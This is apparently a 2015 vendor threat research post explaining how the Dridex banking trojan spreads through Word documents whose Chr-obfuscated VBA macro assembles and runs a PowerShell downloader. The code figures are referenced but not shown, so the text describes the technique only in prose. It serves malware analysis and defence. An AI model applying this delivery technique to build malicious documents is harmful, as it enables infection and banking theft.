Threat Research

Dridex’s Macro Downloader

By Raul Alvarez | April 29, 2015

Modern malware use every possible vector of attack to infect a system. Emails, which are available to almost everyone, are common carriers. In this type of attack, attackers try to lure users to open malicious attachments that look like documents, but have multiple file extensions, such as “financial.doc.exe”. Most of the time, the user only sees the “financial.doc” filename without the ".exe" extension, which makes it easy to assume that it is a Microsoft Word document. Once the file is clicked and executed, the executable can download the rest of its malicious components.

But antivirus and security applications are now smarter than ever and are not tricked by multiple extension names.  Even some users nowadays can easily spot a maliciously crafted email attachment's filename.  Therefore, in order for attackers to trick the user into clicking a document attachment, they must go back old school.  Now, they are back to using macros that run only within a document.  Macros are not visible to the user, and it is not easy to spot a malicious document just by looking at the file extension.

Macros are embedded VBA (Visual Basic Application) that executes whenever you open a malicious document. The common attacker’s technique is to show a normal looking document while the macro runs in the background. It will then download and execute other malware to infect your system. (Another article about the return of macros can be seen here.)

Macros and Dridex

Dridex is a banking trojan that uses a macro to trick the user into downloading itself into the user’s machine. Figure 1 below shows the macro, detected as WM/Agent!tr, used by Dridex to download its main malware component. The macro is just a single procedure containing different string variables. A simple obfuscation technique is used where the Chr function is utlitized to hide the actual strings.

Once the strings have been resolved, it forms the downloader code containing PowerShell instructions. Then, the malware uses the Shell function to execute the downloader code.

Figure 1. The macro used by Dridex.


Figure 2 shows the downloader code containing the URL of the Dridex’s executable file. If PowerShell application is installed on the user’s system, the malware will download the executable file using the DownloadFile method of the Webclient class. The malware is downloaded as a .cab file and expanded as 4543543.exe. Afterwards, it is executed and eventually infects the system.

Figure 2.  The PowerShell downloader code.


Macros are now more powerful than before with the help of other features, such as PowerShell. That is one of the reason why attackers are including them in their arsenal. Due to its simplicity, ease of use, and more additional features, we are going to see more of them in the future.

We will continue to monitor new malware techniques and strategies and make appropriate protection from them to keep you safe.

Join the Discussion